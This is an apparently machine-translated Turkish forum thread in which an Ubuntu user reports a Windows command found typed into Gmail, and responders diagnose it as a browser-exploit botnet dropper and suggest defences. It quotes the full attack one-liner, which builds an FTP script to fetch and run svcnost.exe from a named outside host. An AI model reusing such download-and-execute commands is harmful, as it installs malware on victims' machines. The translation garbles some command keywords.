Linux bilgisayarımın saldırıya uğradığını nasıl belirleyebilirim?

Ev bilgisayarım genellikle açık, ancak ekran kapalı. Bu akşam işten eve geldim ve hack girişimi gibi görünen şeyleri buldum: tarayıcımda Gmail'im açıktı (bu bendim), ancak bu TOalanda aşağıdakilerle oluşturuldu :

md / c echo açık cCTeamFtp.yi.org 21 >> ik & echo kullanıcısı ccteam10 765824 >> ik & echo binary >> ik & echo svcnost.exe olsun >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik ik & svcnost.exe & çıkış eko Sahip oldunuz

Bu bana Windows komut satırı koduna benziyor ve mdGmail'in oluşturma modunda olmasıyla birlikte kodun başlaması, birinin cmdkomut çalıştırmaya çalıştığını açıkça gösteriyor . Sanırım bu bilgisayarda Windows çalıştırmadığım için şanslıydım, ancak başkaları da var. Bu, böyle bir şeyin başıma geldiği ilk kez. Linux gurusu değilim ve o zaman Firefox dışında başka programlar da çalıştırmıyordum.

Bunu yazmadığımdan kesinlikle eminim ve fiziksel olarak bilgisayarımdan başka kimse yoktu. Ayrıca, yakın zamanda Google şifremi (ve diğer tüm şifrelerimi) benzer bir şeyle değiştirdim, vMA8ogd7bvbu yüzden birinin Google hesabıma saldırdığını sanmıyorum.

Az önce ne oldu? Büyükannemin yıllardır kötü amaçlı yazılımlar çalıştıran eski Windows makinesi değil de yeni bir Ubuntu kurulumu olduğunda, birisi bilgisayarıma nasıl tuş vuruşlar yapıyor?

Güncelleme:
Bazı nokta ve soruları ele alalım:

• Kırsal kesimde Avusturya'dayım. WLAN yönlendiricim WPA2 / PSK ve sözlükte bulunmayan güçlü bir şifre kullanıyor; buradan kaba kuvvet ve 50 metreden daha kısa bir mesafede olması gerekirdi; saldırıya uğraması muhtemel değildir.
• USB kablolu klavye kullanıyorum, bu yüzden yine de herkesin menzil içinde kalması pek mümkün değil.
• O zaman bilgisayarımı kullanmıyordum; Ben işteyken sadece evde boştaydı. Monitöre monte nettop bir bilgisayar olduğu için nadiren kapatıyorum.
• Makine sadece iki aylık, sadece Ubuntu kullanıyor ve ben garip yazılım kullanmıyorum veya garip siteleri ziyaret etmiyorum. Ağırlıklı olarak Stack Exchange, Gmail ve gazeteler var. Oyun yok. Ubuntu kendini güncel tutacak şekilde ayarlandı.
• Çalışan herhangi bir VNC hizmetinin farkında değilim; Kesinlikle bir tane yüklemedi veya etkinleştirmedim. Ayrıca başka bir sunucu başlatmadım. Varsayılan olarak Ubuntu'da çalıştığından emin değilim?
• Gmail’in hesap etkinliğindeki tüm IP adreslerini biliyorum. Google'ın giriş kapısı olmadığından eminim.
• Günlük Dosyası Görüntüleyici buldum , ancak ne arayacağımı bilmiyorum. Yardım?

Gerçekten bilmek istediğim şey, ve beni gerçekten güvensiz hissettiren şey: İnternetten biri makinemde nasıl tuş vuruşları yaratabilir? Bununla ilgili tüm teneke şapka olmadan bunu nasıl önleyebilirim? Ben bir Linux geek değilim, 20+ yıldır Windows ile uğraşan ve bıktım bir babayım. Ve çevrimiçi olduğun 18+ yıl boyunca, kişisel olarak herhangi bir hack girişimi görmedim, bu yüzden bu benim için yeni.

Endişelenecek bir şey olduğundan şüpheliyim. İndirme işlemiyle bir sürücü yapmaya çalışan bir JavaScript saldırısı olasılığı daha fazlaydı . Bu konuda endişeliyseniz, NoScript ve AdBlock Plus Firefox Eklentileri kullanmaya başlayın .

Güvenilir siteleri ziyaret etmek bile güvenli değil, çünkü zararlı olabilecek üçüncü taraf reklamverenlerden gelen JavaScript kodunu kullanıyorlar.

Onu yakaladım ve bir sanal makinede çalıştırdım. Bu mirc yüklü ve bu durum günlüğü ... http://pastebin.com/Mn85akMk

MIRC'yi indirmenize ve sizi spambotlara dönüştürecek bir botnet'e katılmanıza yardımcı olan otomatik bir saldırıdır ... VM'm bir araya geldi ve biri olan bir kaç farklı uzak adresle bağlantı kurdu autoemail-119.west320.com.

Windows 7'de çalıştırıyorum UAC istemini kabul etmem ve güvenlik duvarı üzerinden erişmesine izin vermem gerekiyordu.

Diğer forumlarda bu tam komutun tonlarca raporu var gibi görünüyor ve hatta bir torrent dosyası indirmeyi tamamladığında çalıştırmayı denediğini bile söylüyor ... Bunun nasıl mümkün olacağından emin değilim.

Bunu kendim kullanmadım, ancak şu anki ağ bağlantılarını gösterebilmeli, böylece normal olmayan bir şeye bağlı olup olmadığınızı görebilirsiniz: http://netactview.sourceforge.net/download.html

@ Jb48394 ile muhtemelen bugünlerde her şey gibi bir JavaScript istismarının olduğunu kabul ediyorum .

Bir cmdpencereyi açmaya ( aslında @ torbengb'in yorumuna bakınız ) ve kötü niyetli bir komutu çalıştırmaya çalıştığı gerçeği, sadece arka plandaki trojanın dikkatlice indirilmesi yerine , Firefox'ta tuş vuruşlarına girmesine izin veren bir güvenlik açığından yararlandığını gösteriyor. kod çalıştırma

Bu ayrıca, yalnızca Windows için açıkça yazılmış bu açıklamanın neden Linux'ta çalıştığını da açıklar : Firefox, JavaScript’i tüm işletim sistemlerinde aynı şekilde çalıştırır (en azından dener :)) . Windows'a yönelik bir arabellek taşması veya benzeri bir istismara neden olsaydı, programı yeni çökertirdi.

JavaScript kodunun nereden geldiğine gelince - muhtemelen kötü niyetli bir Google reklamı (reklamlar Gmail’de gün boyunca yayınlanıyor) . Bu olmaz olmak ilk sefer .

Benzer bir Linux makinesinde de benzer bir saldırı buldum . Görünüşe göre Windows için bir çeşit FTP komutu var.

Bu, tüm sorunuzu yanıtlamaz, ancak günlük dosyasında başarısız oturum açma girişimlerini arayın.

Kayıt defterinizde yaklaşık beşten fazla başarısız girişim varsa, o zaman biri çatlamaya çalıştı root. rootBilgisayarınızdan uzaktayken oturum açmak için başarılı bir girişimde bulunuyorsanız , ŞİFRENİZİ HEMEN DEĞİŞTİRİN !! ŞİMDİ DOĞRU demek! Tercihen alfanümerik bir şeye ve yaklaşık 10 karakter uzunluğundadır.

Aldığınız mesajlarla ( echokomutlar) bu gerçekten olgunlaşmamış bir senaryo kiddie gibi geliyor . Ne yaptığını bilen gerçek bir bilgisayar korsanı olsaydı, muhtemelen hala bunu bilmiyor olacaktın.

whois west320.com'un Microsoft'a ait olduğunu bildiren raporlar.

UPnP ve Vino (Sistem -> Tercihler -> Uzak Masaüstü) zayıf bir Ubuntu şifresiyle birleştirildi mi?

Herhangi bir standart dışı havuz kullandınız mı?

DEF CON her yıl bir Wi-Fi erişim noktasına ne kadar ulaşılabileceği konusunda bir Wi-Fi yarışmasına katılıyor - en son 250 mil olduğunu duydum.

Gerçekten korkmak istiyorsan, bir Zeus botnet'in kumanda kontrol merkezinin ekran görüntülerine bak . Hiçbir makine güvenli değildir, ancak Linux'taki Firefox diğerlerinden daha güvenlidir. Daha da iyisi, eğer SELinux kullanıyorsanız .